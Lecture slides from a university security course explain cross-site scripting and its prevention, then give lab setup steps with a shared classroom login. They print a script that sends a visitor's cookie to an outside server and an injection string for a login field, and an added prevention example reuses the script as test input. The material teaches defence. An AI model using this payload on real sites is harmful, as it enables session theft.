User Input Attacks

CPSC 328 Spring 2009

Review

  • Abstract lower level security
  • Provide end-to-end security
  • User security info to server
  • WS Security
    • XML Encryption
    • XML Signature
    • Tokens
  • Authentication/Authorization
    • SAML
    • XACML
    • SSO
  • Gathering System Information
    • Site mapping
    • Comments/error codes
    • Library/plugin vulnerabilities

User Input

  • Cannot trust anything coming from user
    • Form data
    • URLs
    • Scripts
  • Must hold input as suspect until processed/cleared somehow
  • Let the games begin…

Cross-Site Scripting

  • Trick some poor soul into giving you their data
  • Embed code into HTML
  • Subset of HTML injection
  • Can happen when server accepts data from user & sends to web browser without validation/encoding
  • When user connects to site, script runs
  • Most frequent vector: JavaScript
  • Outcomes
    • Data is sent (stolen) to another server
    • Web sites defaced
    • Control user’s browser

XSS: Details

  • Three forms
    • Stored, reflected, & DOM injection
  • Target Sites
    • Blogs, Forums, Forms
    • Anything that receives & displays info back to user
  • What sort of data is targeted?
    • Session IDs
    • Personal info
    • Anything affiliated with the current page
  • Can rewrite page or steal user info

XSS: Tags

  • Some vulnerable tags
    • Script, html, body, img, object, applet, frame, frameset, iframe, layer, style, embed, meta, href
  • How compromised?
    • Form input stored for display
    • URL/link mangling (embedded script)
    • Web bugs to send cookie:

<script>document.write("<img src=\"http://innocent.com/bug.gif?cookie="+document.cookie+"\">")</script>


Poking for Holes

  • Try script-ish characters in input, see what happens
    • <, >, /, :, ',
  • Example (misusing a text entry field):

username: '); bad_code_here;//     password:

  • Character encoding to hide
    • Brackets, “script”, “java”, etc

Movie

Prevention

  • Can try to rule out all the “bad stuff”
    • Difficult to do
    • Always finding new “bad stuff”
  • Easier to enumerate the “good stuff”
  • Use different formatting tags for text entry (blogs, etc)
  • Encode all user-entered text

Prevention Details

  • Validate Input (before using it)
    • Accept known good, reject bad input
  • Encode Output (before sending to browser)
    • Strong encoding, do almost everything
  • Specify Output Encoding
  • Specify Document Encoding
  • Don’t Use Blacklisting for Validation
    • Again, easier to whitelist than blacklist
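An added example in JavaScript (not from the slides) showing the two prevention steps above, whitelist validation of input and encoding of output, applied to the cookie-sending web bug from the XSS: Tags slide; the login-name rule and the renderComment page fragment are assumptions made for the example:

```javascript
// Added example, not from the slides: whitelist validation of input and
// HTML-encoding of output, the two steps listed under Prevention Details.
// Step 1: validate input, accepting only known-good characters. A login
// name is assumed here to be 3-16 letters, digits or underscores (this
// rule is an assumption for the example, not one the slides give).
const USERNAME_RE = /^[A-Za-z0-9_]{3,16}$/;

function isValidUsername(input) {
  return USERNAME_RE.test(String(input));
}

// Step 2: encode output before it reaches the browser. Each character that
// can open or close a tag, an attribute or a script string is replaced by
// its HTML entity, so the browser renders it as text rather than markup.
const HTML_ENTITIES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
  "/": "&#x2F;",
};

function htmlEncode(text) {
  return String(text).replace(/[&<>"'\/]/g, (ch) => HTML_ENTITIES[ch]);
}

// Builds the HTML a blog or forum page would show for a stored comment.
// Raw user text never goes into the page; only its encoded form does.
function renderComment(author, body) {
  return `<p><b>${htmlEncode(author)}</b>: ${htmlEncode(body)}</p>`;
}

// Constructed sample input: the cookie-sending web bug from the XSS: Tags
// slide, submitted as the body of a comment.
const WEB_BUG =
  '<script>document.write("<img src=\\"http://innocent.com/bug.gif?cookie="' +
  '+document.cookie+"\\">")</script>';

// Runs both checks: does any live <script> tag survive encoding, and which
// login names pass validation.
function demo() {
  const html = renderComment("mallory", WEB_BUG);
  return {
    scriptTagSurvives: /<script/i.test(html),               // false
    goodLogin: isValidUsername("smith"),                    // true
    injectedLogin: isValidUsername("'); bad_code_here;//"), // false
    html,
  };
}
```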

Machine Setup

  • Make sure you are sitting at machine # 4, 12, 15, 17, 19, 22, 24
  • Boot to Linux
  • Create account
  • Setup apache
  • Setup SSH

Create Account

  • Log in
    • User: cpsc
    • Passwd: cpsccpsc
  • su (passwd: cpsccpsc)
  • Create your account
    • <login>: last name
    • password: something you can remember
    • useradd -c "<firstname> <lastname>" -m <login>
    • passwd <login>
    • Enter password when prompted
  • Logout (entirely)

Config Machine

  • Log in as you
  • Kill off things you don’t need
    • Mail, samba, wireless, cupsd, bind, nfsd
  • Launch/config the following:
    • Apache (httpd), sshd, ntpd, mysqld
    • For now, just get them running in multi-user mode (run level 3 - 5)
  • Don’t worry about firewalls (for now)